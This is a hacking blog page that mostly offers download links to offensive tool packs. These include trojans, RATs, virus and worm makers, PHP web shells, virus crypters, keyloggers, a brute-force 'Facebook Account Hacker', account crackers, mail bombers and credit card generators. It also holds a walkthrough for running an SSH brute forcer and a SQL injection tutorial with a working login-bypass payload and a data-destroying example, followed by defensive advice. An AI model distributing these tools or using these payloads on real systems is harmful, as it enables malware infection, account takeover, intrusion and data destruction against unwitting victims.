Ksecurity-team

Subscribe & Don,t Miss A Free Hacking Course| Receive Daily Updates

Enter your email address:

Delivered by FeedBurner

Super Hack Tools Pack



Super Hack Tools Pack
Quote:
Here is a Super tool pack far all the hackers!

* IMC Grahams Trojan
* IMC Ice Dragon
* Myspace Password Cracker
IMC Myspace Phisher
* Ultra Surf
* Rapid Share Account Gen
* MSN Nudge Madness
.... and 100 More
+
Password cracker 2008
Google Hacking Tools
EbooksADDED WiFi Security Live Cracking CD and Many Many more
Quote:
* IMC Myspace Phisher
* Ultra Surf
* Rapid Share Account Gen
* MSN Nudge Madness
* Ice Reloaded MSN Freezer
* IMC Handbook
* BrutusAE2
* Lord PS
* Hoax Toolbox
* IMC Word List
* Blues Port Scanner
* Bandook RAT v1.35
* Project Satan 2.0
* EES binder v1.0
* File Injector v3
* Remote Desktop Spy v4.0
Passivve Terror v1.3 Final Edition
* Dyn-DL (Dynamic downloader)
* Silent Assassin v2.0
* Net Scan Tools v4.2
* Rocket v1.0
* NStealth HTTP Security Scanner v5.8
* Attack Toolkit v4.1 & source code included
* Legion NetBios Scanner v2.1
* Battle Pong
* TeraBIT Virus Maker v2.8
* p0kes WormGen 2.0
* JPS Virus Maker
* IRC Ban Protection
* IRC Mega Flooder
* FTP Brute Hacker
* RAR Password Cracker
* Vbulletin 3.6.5 Sql Injection Exploit
* IPB 2-2.1.5 Sql Injection Exploit
* IPB 2-2.1.7 Exploit
* Cain & Abel v4.9.3
* NetStumbler 0.4.0
* Cryptor 1.2
* VNC Crack
* Mutilate File Wiper 2.92
* Hamachi 0.9.9.9
* pbnj-1.0

Plus some more apache hacking stuff etc

Apache Hacking TooLz Directory:
Apache Chunked Scanner
Apache Hacker Tool v 2.0
Apache H4x0r Script
Remote File Inclusion And Remote Command Execution Directory :
IIS 5 Dav Scanner & Exploiter
PHP Attacker
PHP Injection Scanner & Exploiter
XML-RPC Scanner & Exploiter
Databases & SQL Injection & XSS TooLz Directory
Casi 4.0
ForceSQL
Mssql BruteForce TooL
SQL Ping 2
SQL Recon
SQL Vuln Scanner
SQL & XSS TooL
PHP Shells

**** v2.0
c99shell #16
Backdoor php v0.1
r57shell
ajan
casus15
cmd (asp)
CyberEye (asp)
CyberSpy5 (asp)
Indexer (asp)
Ntdaddy (asp)
News Remote PHP Shell Injection
PHP Shell
phpRemoteView
nstview php shell
Code:
http://rapidshare.com/files/181352698/IMC_Tool_Set.zip


Read More Add your Comment 1 comments


WorkinG Tools Collection



WorkinG Tools Collection

Quote:
2 - Windows Admin Password Reset (Small Linux disk) -- Its a small linux image which can resets the admin password.
Code:

Code:
http://uploading.com/files/14747c2e/Wind...nload.rar/
3 - RAPIDSHARE ACCOUNT CHECKER(New Mask Added) -- Title says it all.
Code:

Code:
http://uploading.com/files/51cd3m24/RS%2...ECKER.rar
4 - SQL FUZZER WITH VIDEO TUTORIAL(Only 1.5mb) -- Powerfull tool for sql injection.
Code:

Code:
http://uploading.com/files/253aaa2a/SQL%...ORIAL.rar/
5 - Ca0s SQL Perl Inj3ct0r v1 -- Good SQL injection tools source code.
Code:

Code:
http://uploading.com/files/9me23443/Ca0s...%2Bv1.rar/
6 - Milw0rm_Search_Utility_v1.0 by skyweb07 -- Small utility which can search exploits for you.
Code:

Code:
http://uploading.com/files/bfaem73d/Milw...web07.zip/
7 - Vaqxine Keylogger -- A very good tool by reputed member,it might not be FUD now but its a good tool.
Code:

Code:
http://uploading.com/files/69df2e18/Vaqx...ublic.rar/
8 - Hackers Tool Box -- Many handy tools.
Code:

Code:
http://uploading.com/files/3fm492c2/Hack...%2Bv1.rar/
9 - Image Worm -- It replaces every image on victim's pc with your defined image
Code:

Code:
http://uploading.com/files/3fe18118/Nath...BWorm.rar/
10 - HTTP Recon 7.3 -- Use it know weather an exe is backdoored or not.Basically its for Fingerprinting and vulnerability analysis.
Code:

Code:
http://uploading.com/files/fmd19969/httprecon-7.3.zip/
11 - JKymmel's Crypter -- For crypting you viruses.
Code:

Code:
http://uploading.com/files/e4m6514m/JKym...2B1.2.rar/
12 - Icon changer -- Change the icon of any file
Code:

Code:
http://uploading.com/files/6ad6aff5/IconChanger.rar/
SECURITY TOOLS:


Code:
http://uploading.com/files/b9daed94/Anti..._v3.0.rar/
VIRUS SCAN


File Info

Report generated: 15.9.2009 at 7.52.12 (GMT 1)
Filename: AntiKeyloggerShieldSetup.exe
File size: 777 KB
MD5 Hash: 568653abbacc55b375b9c711ebc56880
SHA1 Hash: C36F1AC48FB041A69F6A2D17DC873F2FEBA0BF25
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
Detection rate: 0 on 23

Detections

a-squared - -
Avira AntiVir - -
Avast - -
AVG - -
BitDefender - -
ClamAV - -
Comodo - -
Dr.Web - -
Ewido - -
F-PROT6 - -
Ikarus T3 - -
Kaspersky - -
McAfee - -
NOD32 v3 - -
Norman - -
Panda - -
QuickHeal - -
Solo Antivirus - -
Sophos - -
TrendMicro - -
VBA32 - -
VirusBuster - -
ZonerAntivirus - -

Scan report generated by
NoVirusThanks.org


21 - Process Explorer -- A utility for listing all the processes running.
Code:

Code:
http://uploading.com/files/a42dd34f/Pokm...lorer.rar/


Read More Add your Comment 0 comments


Ultimate Crackers Collection



Ultimate Crackers Collection

Quote:
i m posting all type of cracking tools
1.Cam4_Cracker
2.Decaptcher_Cracker
3.DepositFiles_Cracker
4.Easy-Share_Cracker
5.FileDen_Cracker
6.Hotfile_Cracker
7.Hotmail-MSN_Cracker
8.KewlShare_Cracker
9.*********_Cracker
10.Mediafire_Cracker
11.Megashare_Cracker
12.Megashares,netload.in,twitter,gigazize.uploadin g.com_Cracker
13.Megaupload_Cracker
14.PornHub_Cracker
15.Rapidshare_Collectors_Cracker
16.Rapidshare_Cracker (new)
17.Rapidshare_Cracker (old)
18.Sendspace_Cracker
19.Uploading Cracker
20.Warez-Bb_Cracker
21.Yahoo_cracker
Code:
http://rapidshare.com/files/340271108/Ultimate_Crackers_Collection.rar.html


Read More Add your Comment 0 comments


Gmail Keylogger



Gmail Keylogger


Code:
http://www.multiupload.com/A0SSQNAHGD


Read More Add your Comment 2 comments


Facebook Account Hacker v2.4







Quote:
Hack Facebook Accounts

Enter The Target E-Mail Address


Type In A Number Of Password To Randomly Generate To Try To Hack The Facebook Account


Uses The Facebook API To Quickly Enter Passwords And Bypass CAPTCHA
Code:
http://www.crazyupload.com/9sc8gqvcb6e1/Facebook_Account_Hacker_v2.4.rar.html
Code:
http://uploading.com/files/V2F6N61T/Facebook_Account_Hacker_v2.4.rar.html
http://hotfile.com/dl/9187953/2be2360/Facebook_Account_Hacker_v2.4.rar.html


Read More Add your Comment 3 comments


Best Hacking Tools Jumbo Collection Ever





Quote:
#### Clients ####
back orifice source
BackDoor v2.0
DeepThroat v3.1
Doraah War Engine v1.0b
Hack 'a' Tack v1.20
Http Bomber v1.001b
Kuang2 Client v0.21
NetBus v1.20
NetBus v1.70
NetBus v2.0b Pro
SchoolBus v1.85
Shadow Remote Administator & Control v1.04
Shadow Security Scanner v5.07
Shadow Security Scanner v5.21
SubSeven v2.1 Gold Edition
SubSeven v2.1
Vampire v1.2
WebCracker v4.0
WinCrash v2.0
wwwhack v1.913
------------------

#### Security ####
Anti-Keylogger v2.1
Anti-Trojan v5.5
Local Port Scanner v1.2.2
NeoTrace Pro v3.20
NeoWatch v2.4
PestPatrol v3.2
ProPort v2.0
Trojan remover v3.3.7
Trojans First Aid Kit v5.0
------------------

#### Serial Software ####
Angus v3.0
Dragon v2.0
KeyGen Killer v1.1
NEO 2.0b
Octavius v2.1
Oscar 2000
Ripper v1.00
Serial-0-Matic v2.4
Serials 2000 Template file - Little Red Wagon
Serials 2000 v7.1 Crew 2001-9-16
Serials 2000 v7.2 BytE RippeR 2003-12-15
Tesla v1.4
------------------

#### Chat ####
Blue Fire v2.5
------------------

#### Mail Bomb ####
Anonymous Mail Bomber
Divine Intervention
Euthanasia v1.52
fmbomb
Homicide
KaBoom v3.0
Mail Bomber v8.1
Mail Fraud
mailbombv02b
MiSoSKiaN's Fake Mail
Nemisis Mail Bomber v1.0
Poperganda v2.0
Quick Fyre
Saddamme v0.2
SMS Bomber v1.3
Unabomber
------------------

#### Ping & Nukes ####
Battle Pong v1.0
*****Slap v1.0
Click v1.4
Evil FTP Hacker
Evil Ping v0.3b
F-ed Up v2.0
Gimp
IgmpNuke v1.0
kod
LORNuke v2.0
Meliksah Nuke v2.5
Muerte v2.1
Nuke v2.3
Nuke'em v1.0
VZMNuker
WinNuke v95
------------------

#### Keyboard Key Logger ####
KeyLog98
KeyTrap v1.0
------------------

#### Java ####
appletkiller
attackthread
consume
hostile
nasirc
scapegoat
silentthreat
ungrateful
wasteful
------------------

#### Port & IP Scaner ####
Angry IP Scanner v2.08
Ass Sniffer v1.0.1
Blues Port Scanner v5
IP Stealer Utilities
ITrace32 v2.00
Porter v1.2
SuperScan v2.06
------------------

#### Credit Card Generator ####
CCard Number Generator
Credit Card Generator v1.0b
------------------

#### Crash Hard Drive ####
Crash Pentium 2
Hard Drive Killer Pro v4.0
Hard Drive Killer Pro v5.0b
------------------

#### Password Recovery Tool ####
Cain v1.51
LC3

Download and Enjoy hacking....

Code:
http://hotfile.com/dl/10875668/eb6b4fa/hack_aio.rar.html
Password
Code:
www.dl4all.com


Read More Add your Comment 1 comments


Top 20 Hacking Tools



hese are Top 20 Hacking Tools, the list is exhaustive, this are a few to name.

Nessus
The “Nessus” Project aims to provide to the internet community a free, powerful, up-to-date and easy to use remote security scanner for Linux, BSD, Solaris, and other flavors of Unix.
Ethereal
Ethereal is a free network protocol analyzer for Unix and Windows. Ethereal has several powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session.
Snort
Snort is an open source network intrusion detection system, capable of performing real-time traffic analysis and packet logging on IP networks.
Netcat
Netcat has been dubbed the network swiss army knife. It is a simple Unix utility which reads and writes data across network connections, using TCP or UDP protocol
TCPdump
TCPdump is the most used network sniffer/analyzer for UNIX. TCPTrace analyzes the dump file format generated by TCPdump and other applications.
Hping
Hping is a command-line oriented TCP/IP packet assembler/analyzer, kind of like the “ping” program (but with a lot of extensions).
DNSiff
DNSiff is a collection of tools for network auditing and penetration testing. dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for interesting data (passwords, e-mail, files, etc.).
GFI LANguard
GFI LANguard Network Security Scanner (N.S.S.) automatically scans your entire network, IP by IP, and plays the devil’s advocate alerting you to security vulnerabilities.
Ettercap
>Ettercap is a multipurpose sniffer/interceptor/logger for switched LAN. It supports active and passive dissection of many protocols (even ciphered ones)and includes many feature for network and host analysis.
Nikto
Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 2500 potentially dangerous files/CGIs, versions on over 375 servers, and version specific problems on over 230 servers.
John the Ripper
John the Ripper is a fast password cracker, currently available for many flavors of Unix.
OpenSSH
OpenSSH is a FREE version of the SSH protocol suite of network connectivity tools, which encrypts all traffic (including passwords) to effectively eliminate eavesdropping, connection hijacking, and other network-level attacks.
TripWire
Tripwire is a tool that can be used for data and program integrity assurance.
Kismet
Kismet is an 802.11 wireless network sniffer – this is different from a normal network sniffer (such as Ethereal or tcpdump) because it separates and identifies different wireless networks in the area.
NetFilter
NetFilter and iptables are the framework inside the Linux 2.4.x kernel which enables packet filtering, network address translation (NAT) and other packetmangling.
IP Filter
IP Filter is a software package that can be used to provide network address translation (NAT) or firewall services.
pf
OpenBSD Packet Filter
fport
fport identifys all open TCP/IP and UDP ports and maps them to the owning application.
SAINT
SAINT network vulnerability assessment scanner detects vulnerabilities in your network’s security before they can be exploited.
OpenPGP
OpenPGP is a non-proprietary protocol for encrypting email using public key cryptography. It is based on PGP as originally developed by Phil Zimmermann.


Read More Add your Comment 0 comments


SSHatter SSH Brute Forcer



SSHatter is an SSH brute force utility available from http://freshmeat.net/projects/sshatter/?branch_id=70781&release_id=263196. Essentially the tool is comprised of a small Perl file. The utility requires a few non-standard Perl libraries but these are easily installed. You must have Perl installed to use SSHatter.

Installing SSHatter

First download and unpack the tool:

$ wget http://freshmeat.net/redir/sshatter/70781/url_tgz/get.php
$ tar -xvzf SSHatter-0.6.tar.gz
SSHatter-0.6/
SSHatter-0.6/src/
SSHatter-0.6/src/INSTALL
SSHatter-0.6/src/SSHatter.pl
SSHatter-0.6/src/passwords
SSHatter-0.6/src/TODO
SSHatter-0.6/src/md5.asc
$ cd SSHatter-0.6/src
Next you may have to install the following perl libraries.

Install Parallel::ForkManager

To install Parallel:::Forkmanager it is easiest to simply download the source from http://search.cpan.org/~dlux/Parallel-ForkManager-0.7.5/ForkManager.pm and compile the module yourself:
$ wget http://search.cpan.org/CPAN/authors/id/D/DL/DLUX/Parallel-ForkManager-0.7.5.tar.gz
$ tar -xvzf Parallel-ForkManager-0.7.5.tar.gz
$ cd Parallel-ForkManager-0.7.5
$ perl Makefile.pl
$ make
$ sudo make install

Install Net::SSH-Perl

This package is usually distributed as a package and can easily be installed on most systems. On Fedora use:
$ sudo yum install perl-Net-SSH-Perl
Once you have installed these modules you'll need to create a file full of potential targets and a file of usernames to try. A simple password file is distributed with SSHatter but you may want download and utilize a more extensive one. SSHatter also uses a file of usernames. Again, you can download an extensive file or perhaps tailor this file to the target system. For our purposes we'll simply target localhost and try and brute force the user root:
$ perl SSHatter.pl
usage: SSHatter.pl      
  sleeptime: 0 - disable retries at SSHatter.pl line 62.
$ echo root > users
$ echo 127.0.0.1 > targets
$ perl SSHatter.pl 1 targets users passwords 1 1

Evaluation

The source code to SSHatter is a mere 168 lines, making it rather compact. SSHatter also supports connection attempts to alternate port numbers if the targets are listed with an IP address, then a colon and the port (i.e. 127.0.0.1:20). SSHatter does include the handy functionality of being able to sleep between tries, so you can slow your brute force attempts, which may evade some filters.
All in all SSHatter is a simple, straightforward tool. It isn't particulary fast, stealthy or easy to use. It doesn't include any advanced functionality such as documentation, randomly generated passwords or a GUI. SSHatter also doesn't have any easy way to configure scans of ranges of IP's and seems to rely on a pre-built target list. SSHatter is also distributed as copyrighted material, rather than as GPL material, which will probably limit any sort of participation or active development community.


Read More Add your Comment 0 comments


sql injection white paper





Read More Add your Comment 0 comments


SQL Injection fundamental



SQL injection attacks bear many of the same fundamental hallmarks as XSS attacks. At its core and SQL injection abuses the web application to introduce unintended functionality. SQL injection aims to escape out of the confines of a developer crafted SQL statement to alter the SQL. Take the following example:

$name = $_POST['name'];
$query = "select * from users where user_name = '$name'";
$result = mysql_query($query);
If the post variable "name" is set to an expected value, say, Bob, then the resulting SQL will execute:
select * from users where user_name = 'Bob'
This is a perfectly valid SQL statement and probably functions in the exact manner that the developer intended. Problems creep into the system when users are allowed to change the way that the SQL executes. Imagine what would happen if a user decided to input "Bob'; delete database; --". The query that result from such input would be:
select * from users where user_name = 'Bob'; delete database; --'
in SQL the semi colon is used to delineate statements. Thus, instead of one SQL statement, the input breaks up the actual SQL that will be executed into three statements. In SQL the double dash "--" indicates the start of a comment, so each of these statements would end up being valid, resulting in:
select * from users where user_name = 'Bob';
delete database;
--'
You can see the catastrophic damage that could be done with such a query. Luckily for us, we're utilizing a PHP/MySQL application that uses the mysql_query() function to pass queries to the database. This function won't allow stacked queries (meaning only one query can be passed into the function at a time). This means that the above described attack won't actually work on a PHP/MySQL application. This doesn't, however, mean that PHP/MySQL applications are immune from the SQL injection threat!
Knowing how a SQL injection attack works can you see any SQL injection vulnerabilities in the test application? There are lots of them so keep your eyes out for them.

Finding SQL Injection Vulnerabilities

The most difficult thing about a SQL injection attack is finding a vulnerability. Pulling off a successful SQL injection requires some precise information about the type of database, the database scheme, and even table structures. Finding this information can be quite difficult. Of course, one could always just attempt blind guessing, but this isn't very effective. Fortunately many developers unwittingly provide mechanisms for an attacker to reconnoiter an application for SQL injection attacks.
It is quite common for developers to include debugging messages when SQL queries fail. This is completely unnecessary since the errors are useless to an end user and only help to aid an attacker in mapping the data structures. Ideally error messages should be logged and a helpful message should be displayed to the user that indicates whom to contact and perhaps even alerts a developer to the fact that an error log has been produce. All to commonly, however, you will find PHP that looks something like:
if (! $result = mysql_query($query)) {
 echo "Problem with query:  $query
"; die(mysql_error());; }
Not only will this expose the error message, it will also expose the query that caused the error. This gives a nice blueprint to an attacker as to the layout of an application.
In the test application all the error messages are constructed using this poor reporting. You can trip a SQL error by attempting to log in using a username with a single quote in the name. This will cause a SQL injection that will throw an error. For instance attempting to log in using the username 'foo (leave the password field blank) will cause the following error to be displayed:
Problem with query: select user_password from user where user_name = ''foo' and user_password = 'd41d8cd98f00b204e9800998ecf8427e' 

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'foo' and user_password = 'd41d8cd98f00b204e9800998ecf8427e'' at line 1
This error message provides a real wealth of information. Let's start by analyzing what caused the error. It's easy to spot the orphaned single quote in the query at the "name = ''foo'" portion. The extra quote in the name is causing malformed SQL. This can be worked around with some cleverness, but proves that SQL injection is possible. The second error message is perhaps the most helpful in identifying the exact source of the error message.
The second interesting tidbit is the password part of the query. Instead of passing a blank entry there is a 32 character string. This is pretty much a dead giveaway that the application is, quite wisely, storing hashes of passwords in the database. You can guess that the value inserted by a user is hashed and that hash value is compared to the value in the database.
Despite the use of a secured password we can actually use the SQL injection to bypass the authentication of the test application. Looking at the blog posts it seems like there is a user named 'admin'. We can try to authenticate as admin by exploiting the logic in the user authentication query. Because we can manipulate the query with SQL injection we can introduce new parameters to the query. See if you can figure out how to do this on your own.

Exploiting the Vulnerability

Once you've tried a few combinations we can look at one of the several ways that we can end run this authentication. The authentication SQL query is structured as such:
select user_password from user where user_name = '[value]' and user_password = '[value]' 
Because SQL is evaluated left to right with respect to AND and OR, what if we threw an OR statement into the query that always evaluated as true. For instance, what if we manipulate the query so that it ends up being:
select user_password from user where user_name = 'admin' AND 1=1 OR user_name='admin' and user_password = '[hash value]' 
We can do this by logging in using the username:
admin' AND 1=1 OR user_name='admin
Go ahead and try this out and notice how the site actually lets you log in as the administrator. This is because the SQL query ends up selecting the password if the name is 'admin' and 1=1 (which it always does) OR if the name is 'admin' and the password is whatever hash we got. You can see the second part of the query fails, but the first part succeeds, and because:
IF TRUE OR FALSE = TRUE
The query returns the requested value. You can also see how a good understanding of SQL helps an attacker with this sort of attack.
There are several other SQL injection possibilities throughout the test site. Because query stacking is illegal using the mysql_query() function the damage from SQL injection is limited to the type of query being executed. Thus, an INSERT statement could be manipulated to insert new or malformed data. More dangerous would be an UPDATE statement. In fact, there is an UPDATE statement available in the test application. If you log in and create a new user account you can update your account name and password. You can perform a SQL injection attack to update the admin password, which would cause a denial of service for the real admin and elevate your own privilege to that of admin. The most dangerous type of SQL injection would occur with a DELETE statement, but there aren't any of those in this particular test application.

Protecting Against SQL Injection

The easiest way to protect against SQL injection attacks is to sanitize data as it is passed in by a user, as well as sanitizing any data that is pulled out of the database. PHP has several amazingly useful functions for this purpose. The most effective is mysql_real_escape_string(). Using this will prevent any SQL injection by escaping single quotes properly.
Using strict data typing can also help. Functions like intval() can be used to translate user input into strict data types. This prevents bad data from even making it into the query.
Other functions such as htmlentities(), htmlspecialchars(), and even urlencode() can be used to craft safer data for display. This can prevent problems down the road, protecting against threats such as XSS.
The bottom line is that you should never trust user input. Never trust any input from the client. Even hidden form fields can be manipulated, and Javascript checks can easily be evaded (just check out the Tamper Data extension for Firefox to see how easy this is). You have to be sure you sanitize data on the server side before passing it to a SQL query. Even once data is in the database, it should be handled with care when extracted and displayed.
Using prepared statements and libraries like MDB2 can greatly enhance your application security. Using a central library for all SQL queries can insure that each query is properly sanitized before being executed (rather than trying to keep track of and secure queries all over your code). Using object oriented code can also help, forcing variables to be passed into objects before being passed to SQL queries provides further opportunities to sanitize your data.


Read More Add your Comment 0 comments


 

Members

Join Us At Facebook

Enter your email address:

Delivered by FeedBurner

© 2011 Ksecurity-team All Rights Reserved Hackguide4u Theme by Adnan Anjum Learn Hacking Online hackguide4u.blogspot.com